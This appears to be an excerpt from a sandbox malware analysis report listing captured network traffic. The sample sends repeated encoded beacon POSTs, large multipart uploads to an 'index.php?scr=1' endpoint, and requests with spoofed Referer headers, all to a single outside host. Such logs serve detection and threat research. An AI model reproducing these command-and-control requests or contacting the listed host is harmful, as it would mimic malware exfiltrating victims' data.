Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUwOTg=Host: atillapro.comContent-Length: 85250Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUwOTg=Host: atillapro.comContent-Length: 85250Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODg0MTU=Host: atillapro.comContent-Length: 88567Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUwOTg=Host: atillapro.comContent-Length: 85250Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUwOTg=Host: atillapro.comContent-Length: 85250Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUyNjE=Host: atillapro.comContent-Length: 85413Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTExMjQ=Host: atillapro.comContent-Length: 91276Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUwOTg=Host: atillapro.comContent-Length: 85250Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUwOTg=Host: atillapro.comContent-Length: 85250Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTEwNDE=Host: atillapro.comContent-Length: 91193Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUwODc=Host: atillapro.comContent-Length: 85239Cache-Control: no-cache
Source: Joe Sandbox View ASN Name: SIMPLECARRER2IT SIMPLECARRER2IT
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pxiisjuf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: atillapro.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yjipbis.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: atillapro.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fvnqnoupu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: atillapro.com
